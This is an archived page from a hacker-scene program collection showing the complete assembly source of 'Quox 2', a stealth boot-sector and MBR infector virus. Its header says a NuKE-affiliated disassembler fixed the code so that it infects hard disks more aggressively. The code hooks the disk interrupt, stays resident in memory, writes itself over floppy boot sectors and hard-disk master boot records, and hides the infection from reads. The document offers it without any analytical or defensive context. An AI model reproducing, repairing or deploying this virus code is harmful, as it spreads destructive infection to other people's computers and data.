home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Collection of Hack-Phreak Scene Programs
/
cleanhpvac.zip
/
cleanhpvac
/
SOURCE.ZIP
/
QUOX2.ASM
< prev
next >
Wrap
Assembly Source File
|
1996-03-17
|
9KB
|
294 lines
comment %
Title : Quox 2
Type : Stealth, Boot + MBR infector
Assembler : Use A86 to create a .BIN bootsector image.
Disass : Dark Fiber [NuKE]
Comments : This is a *FIXED* version of Quox, I fixed the code
coz I think someone purposley fucked with the copy I had.
This version will correctly check to see if its already in
memory, it will also infect hard disks whenever the mbr is
accessed instead of just on booting up from an infected
disk or whatever the original did.
Its 95% in its original state.
%
Dos_Media_Descriptor equ 015h
org 0
;this code is used as its infection marker.
start:
cli
xor ax,ax
mov ss,ax
mov sp,7C00h ;set stack below code
sti
jmp short Install_Memory
Infection_Marker_Len equ $ - Start
;floopy boot block shit, 02Ch bytes long.
Boot_Block:
add [bp+si],al
add al,[bx+di]
add [bp+si],al
jo $+2
mov al,ds:[0f905h]
add ax,[bx+si]
or [bx+si],ax
add al,[bx+si]
db 10 dup (0)
db 29h,0F3h
db 8, 'X[_QUOX_ '
db 0
Boot_Block_Len equ $ - Boot_Block
Install_Memory:
cld
mov ds,ax
mov si,013h * 4 ;int 13 vect offset
push cs
pop es
mov di,07c00h + offset Old_Int_13
movsw
movsw
;This memory check routine is fucked.
;it checks the wrong part in memory when it looks for itself.
mov ax,[0413h] ;get amount o mem in kb
mov dx,ax
mov cl,6
shl ax,cl ;convert to paras
mov si,07C00h
mov di,1024
mov es,ax
mov cx,Infection_Marker_Len ;is virus in TOM
repe cmpsb
jz Already_In_Memory
sub ax,1024/16 ;sub 1 kb from paras
dec word ptr [0413h] ;sub 1 kb from total
Already_In_Memory:
cli
mov word ptr [04ch],offset Int_13_Handler
mov [04eh],ax ;set new Int 13h
sti
mov es,ax
xor di,di
mov si,07c00h
mov cx,256 ;copy virus to TOM
rep movsw
mov ax,offset Jump_2_Himem ;Jump up to TOM
push es
push ax
retf
Jump_2_Himem:
push cs
pop ds
mov si,offset _Sector_Locn ;Reset disk system
mov ah,0
mov dl,[si+2]
int 13h
xor ax,ax
mov es,ax
mov bx,7C00h
mov ax,201h
mov cx,[si]
mov dx,[si+2]
call Sim_Int_13 ;read in original
jc Jump_2_Himem ;boot sector\mbr
db 0eaH ;jmp 0:7c00h
dw 07c00h ;jump into old boot
dw ? ;code
Int_13_Handler:
cmp ah,2 ;read?
je Try_Infection
cmp ah,3 ;write?
je Try_Infection
Run_Int_13:
jmp dword ptr cs:[Old_Int_13] ;run old int13
Try_Infection:
call Check_Type ;is it a good disk?
jnz Run_Int_13
cmp cx,1 ;from first sector?
jne Run_Int_13
push ds
push es
pusha
call Sim_Int_13 ;run function
pushf
push cs
pop ds
call Grab_Boot ;get boot\mbr sector
jc No_Infection
jz Stealth_Read ;stealth read
call Infect_Disk ;infect it
call Clean_Buffer ;clean memory
No_Infection:
popf
popa
pop es
pop ds
retf 2
Stealth_Read:
popf
popa
mov ax,0201h
mov cx,[512 + _Sector_Locn]
mov dx,[512 + _Drive]
pop es
pop ds
jmp short Run_Int_13
Sim_Int_13:
pushf
call dword ptr cs:[Old_Int_13]
ret
Check_Type:
or dh,dh
jnz Bad_Type
cmp dl,1
jae Good_Type
cmp dl,080
jne Bad_Type
Good_Type:
push ax
xor ax,ax
pop ax
Bad_Type:
ret
Clean_Buffer:
pusha
push cs
pop es
xor ax,ax
mov cx,256
mov di,512
rep stosw
popa
ret
Grab_Boot:
mov di,2
Read_Sector:
push cs
pop es
mov bx,200h
mov ax,201h
call Sim_Int_13
jnc Check_For_Infection
dec di
jnz Read_Sector
stc
ret
Check_For_Infection:
xor si,si
;** mov di,bx
db 08bh, 0fbh
mov cx,Infection_Marker_Len
repe cmpsb
ret
Infect_Disk:
push cs
pop es
mov di,offset _Sector_Locn
mov si,512 + Dos_Media_Descriptor
cmp byte ptr [si],0F6h ;? maybe 2.88 media?
je End_Infect_Code
mov ax,301h
mov bx,200h
mov dh,1
mov cl,[si+3] ;sectors per track
mov ch,4Fh ;set for 80 tracks
cmp byte ptr [si],0FDh ;1.2mb
jne Is_Hard_Disk
mov ch,27h ;set for 40tracks
Is_Hard_Disk:
cmp dl,80h
jne Not_Hard_Disk
mov cx,w[512 + _Partition + 8] ;starting sector #
xor dh,dh ;realative to beg o hd
Not_Hard_Disk:
mov [di],cx
mov [di+2],dx
call Sim_Int_13
jc End_Infect_Code
mov cx,Boot_Block_Len
mov di,Boot_Block
mov si,512 + Boot_Block
rep movsb
mov di,offset _Partition
mov si,512 + _Partition
mov cx,20h
rep movsw
inc cx
xor bx,bx
mov ax,301h
xor dh,dh
call Sim_Int_13
End_Infect_Code:
ret
Old_Int_13: dd ?
db 30 dup (0) ;??? Filler?
_Sector_Locn: db 09, 04fh
_Drive: db 0h
_Head: db 01h
db 10 dup (0) ;??? More Filler?
_Partition db 64 dup (0)
Bootstrap_BIOS_Marker:
db 55h,0AAh
seg_a ends
end start
